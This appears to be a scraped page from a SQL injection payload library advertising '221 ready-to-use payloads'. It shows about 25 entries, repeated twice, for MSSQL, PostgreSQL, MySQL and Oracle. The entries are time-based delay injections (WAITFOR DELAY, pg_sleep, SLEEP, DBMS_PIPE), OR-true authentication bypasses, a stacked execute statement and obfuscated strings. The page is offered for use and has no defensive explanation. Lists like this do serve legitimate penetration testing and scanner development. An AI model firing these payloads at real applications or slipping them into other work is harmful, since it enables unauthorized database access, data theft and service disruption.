SQL Injection

221 ready-to-use payloads

221 Payloads

221 of 221

MSSQL Time-Based

MSSQL time-based delay 6 seconds

SQLiMSSQLTime-Based

Payload

';%20waitfor%20delay%20'0:0:6'%20--%20

PostgreSQL Time-Based

PostgreSQL pg_sleep 6 seconds

SQLiPostgreSQLTime-Based

Payload

''%7C%7C(select%201%20from%20(select%20pg_sleep(6))x)%7C%7C''

Generic OR True

Generic OR true clause bypass

SQLiGenericBoolean

Payload

)%20or%20('x'='x

Generic OR 1=1

Generic OR 1=1 bypass

SQLiGenericBoolean

Payload

%20or%201=1

MySQL Sleep 13

MySQL sleep 13 with comment polyglot

SQLiMySQLTime-Based

Payload

(select(0)from(select(sleep(13)))v)/*'+(select(0)from(select(sleep(13)))v)+'"+(select(0)from(select(sleep(13)))v)+"*/

Oracle Time-Based

Oracle DBMS_PIPE delay 10s

SQLiOracleTime-Based

Payload

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),10)||'

MySQL Sleep 5

MySQL SLEEP 5 seconds

SQLiMySQLTime-Based

Payload

' AND (SELECT 6377 FROM (SELECT(SLEEP(5)))hLTl)--

MSSQL Exec Select

MSSQL dynamic query execution

SQLiMSSQLStacked

Payload

; execute immediate 'sel' || 'ect us' || 'er'

MySQL Benchmark

MySQL benchmark-based timing

SQLiMySQLTime-Based

Payload

benchmark(10000000,MD5(1))#

Generic NOT True

OR NOT true bypass variant

SQLiGenericBoolean

Payload

1' OR NOT 2470=2470-- Ontu

MSSQL WAITFOR

MSSQL WAITFOR DELAY 5s

SQLiMSSQLTime-Based

Payload

' WAITFOR DELAY '0:0:5'--

MSSQL WAITFOR Semicolon

MSSQL WAITFOR with semicolon

SQLiMSSQLTime-Based

Payload

';WAITFOR DELAY '0:0:5'--

MySQL Sleep Paren

MySQL sleep with double close paren

SQLiMySQLTime-Based

Payload

')) or sleep(5)='

MSSQL Delay Semi

MSSQL waitfor with leading semicolon

SQLiMSSQLTime-Based

Payload

;waitfor delay '0:0:5'--

MSSQL Delay Paren Semi

MSSQL waitfor with close paren

SQLiMSSQLTime-Based

Payload

);waitfor delay '0:0:5'--

MSSQL Delay Quote Semi

MSSQL waitfor after string close

SQLiMSSQLTime-Based

Payload

';waitfor delay '0:0:5'--

MSSQL Delay Double Quote

MSSQL waitfor after double quote

SQLiMSSQLTime-Based

Payload

";waitfor delay '0:0:5'--

MSSQL Delay Paren Quote

MSSQL waitfor paren then quote

SQLiMSSQLTime-Based

Payload

');waitfor delay '0:0:5'--

MSSQL Delay DQuote Paren

MSSQL waitfor double quote paren

SQLiMSSQLTime-Based

Payload

');waitfor delay '0:0:5'--

MSSQL Delay Double Paren

MSSQL waitfor double close paren

SQLiMSSQLTime-Based

Payload

));waitfor delay '0:0:5'--

PostgreSQL pg_sleep

PostgreSQL pg_sleep parameterized

SQLiPostgreSQLTime-Based

Payload

1) or pg_sleep(__TIME__)--

MySQL ELT Obfuscation

MySQL ELT-based string bypass

SQLiMySQLObfuscation

Payload

||(elt(-3+5,bin(15),ord(10),hex(char(45))))

Generic Double Quote True

Double quote escape true clause

SQLiGenericBoolean

Payload

"hi"") or (""a""=""a"

MySQL Sleep Hash

MySQL sleep with double quote and comment

SQLiMySQLTime-Based

Payload

" or sleep(__TIME__)#

PostgreSQL pg_sleep Direct

PostgreSQL pg_sleep direct call

SQLiPostgreSQLTime-Based

Payload

pg_sleep(__TIME__)--

SQL Injection

221 ready-to-use payloads

221 Payloads

221 of 221

MSSQL Time-Based

MSSQL time-based delay 6 seconds

SQLiMSSQLTime-Based

Payload

';%20waitfor%20delay%20'0:0:6'%20--%20

PostgreSQL Time-Based

PostgreSQL pg_sleep 6 seconds

SQLiPostgreSQLTime-Based

Payload

''%7C%7C(select%201%20from%20(select%20pg_sleep(6))x)%7C%7C''

Generic OR True

Generic OR true clause bypass

SQLiGenericBoolean

Payload

)%20or%20('x'='x

Generic OR 1=1

Generic OR 1=1 bypass

SQLiGenericBoolean

Payload

%20or%201=1

MySQL Sleep 13

MySQL sleep 13 with comment polyglot

SQLiMySQLTime-Based

Payload

(select(0)from(select(sleep(13)))v)/*'+(select(0)from(select(sleep(13)))v)+'"+(select(0)from(select(sleep(13)))v)+"*/

Oracle Time-Based

Oracle DBMS_PIPE delay 10s

SQLiOracleTime-Based

Payload

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),10)||'

MySQL Sleep 5

MySQL SLEEP 5 seconds

SQLiMySQLTime-Based

Payload

' AND (SELECT 6377 FROM (SELECT(SLEEP(5)))hLTl)--

MSSQL Exec Select

MSSQL dynamic query execution

SQLiMSSQLStacked

Payload

; execute immediate 'sel' || 'ect us' || 'er'

MySQL Benchmark

MySQL benchmark-based timing

SQLiMySQLTime-Based

Payload

benchmark(10000000,MD5(1))#

Generic NOT True

OR NOT true bypass variant

SQLiGenericBoolean

Payload

1' OR NOT 2470=2470-- Ontu

MSSQL WAITFOR

MSSQL WAITFOR DELAY 5s

SQLiMSSQLTime-Based

Payload

' WAITFOR DELAY '0:0:5'--

MSSQL WAITFOR Semicolon

MSSQL WAITFOR with semicolon

SQLiMSSQLTime-Based

Payload

';WAITFOR DELAY '0:0:5'--

MySQL Sleep Paren

MySQL sleep with double close paren

SQLiMySQLTime-Based

Payload

')) or sleep(5)='

MSSQL Delay Semi

MSSQL waitfor with leading semicolon

SQLiMSSQLTime-Based

Payload

;waitfor delay '0:0:5'--

MSSQL Delay Paren Semi

MSSQL waitfor with close paren

SQLiMSSQLTime-Based

Payload

);waitfor delay '0:0:5'--

MSSQL Delay Quote Semi

MSSQL waitfor after string close

SQLiMSSQLTime-Based

Payload

';waitfor delay '0:0:5'--

MSSQL Delay Double Quote

MSSQL waitfor after double quote

SQLiMSSQLTime-Based

Payload

";waitfor delay '0:0:5'--

MSSQL Delay Paren Quote

MSSQL waitfor paren then quote

SQLiMSSQLTime-Based

Payload

');waitfor delay '0:0:5'--

MSSQL Delay DQuote Paren

MSSQL waitfor double quote paren

SQLiMSSQLTime-Based

Payload

');waitfor delay '0:0:5'--

MSSQL Delay Double Paren

MSSQL waitfor double close paren

SQLiMSSQLTime-Based

Payload

));waitfor delay '0:0:5'--

PostgreSQL pg_sleep

PostgreSQL pg_sleep parameterized

SQLiPostgreSQLTime-Based

Payload

1) or pg_sleep(__TIME__)--

MySQL ELT Obfuscation

MySQL ELT-based string bypass

SQLiMySQLObfuscation

Payload

||(elt(-3+5,bin(15),ord(10),hex(char(45))))

Generic Double Quote True

Double quote escape true clause

SQLiGenericBoolean

Payload

"hi"") or (""a""=""a"

MySQL Sleep Hash

MySQL sleep with double quote and comment

SQLiMySQLTime-Based

Payload

" or sleep(__TIME__)#

PostgreSQL pg_sleep Direct

PostgreSQL pg_sleep direct call

SQLiPostgreSQLTime-Based

Payload

pg_sleep(__TIME__)--